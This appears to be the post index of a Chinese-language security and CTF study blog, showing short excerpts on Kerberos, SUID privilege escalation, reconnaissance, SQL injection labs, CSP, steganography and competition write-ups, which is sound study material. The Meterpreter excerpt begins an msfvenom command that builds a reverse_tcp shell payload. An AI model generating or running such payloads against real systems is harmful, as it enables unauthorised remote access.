• Kerberos&Ticket

    Er… 仅仅是一个笔记 # Kerberos 什么是域 —— 域是一组有边界的计算机的集合 在 Active Directory(AD)中,域是指一个管理范围或网络区域,它包含了用户、计算机、组等对象。通过域,管理员可以统一管理用户权限和资源访问。 ...
  • Meterpreter

    # Meterpreter # reverse_shell # reverse_tcp Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=44...
  • SUID

    # SUID 提权 suid (set uid) 是 linux 中的一种特殊权限,suid 可以让调用者以文件拥有者身份运行该文件,所以利用 suid 提权的核心就是运行 root 用户所拥有的 suid 的文件,那么运行该文件的时候就得获得 ro...
  • Reconnaissance

    # Passive Reconnaissance # Whois WHOIS 信息查询 - 站长工具 (wujingquan.com) kali 上: # nslookup and dig Query type 查询类型 Result 结果...
  • MISC Picture

    # MISC—Picture 一键梭哈网站:https://aperisolve.fr/ # 盲水印隐写 一张图片的情况 可以使用 隐形水印工具 V1.2 或者 WaterMark 来提取水印 两张图片的情况 123先把要处理的图片拉入BlindW...
  • MISC EN/DECode

    CTF—MISC [!IMPORTANT] 参考Lunatic师傅的文章:https://goodlunatic.github.io/posts/1ad9200 ⚠👆👆👆👆👆⚠ 加密/编码base123456789101112...
  • portswigger SqlInjection

    portswigger靶场 SQL注入SQL injection cheat sheet | Web Security Academy (portswigger.net) SQL injection - Fc04dB’s BLOG 🧪实验1:W...
  • 2024网鼎杯-青龙组

    # MISC03 wireshark 打开数据包 全局搜索响应码为 200 的包第三步:经过很多尝试找出正确 ip: 下面记事本是赛题下线之前的记录,重新上线后一个一个尝试发现正确 flag 也可以通过脚本提取所有 ip 然后一个一个试 12345...
  • CSP

    # 内容安全策略(CSP) # 同源策略 同源策略(Same origin policy)是一种约定 是浏览器的行为,是为了保护本地数据不被 JavaScript 代码获取回来的数据污染,因此拦截的是客户端发出的请求回来的数据接收,即请求发送了,服务...
  • DASCTF 2024 十月赛

    # DASCTF 2024 十月赛 # ezlogin EditController.edit 中 /editPass 路由接受用户输入的 newPass UserUtil.changePassword 方法用到了 newPass 参数: 并且是...
1236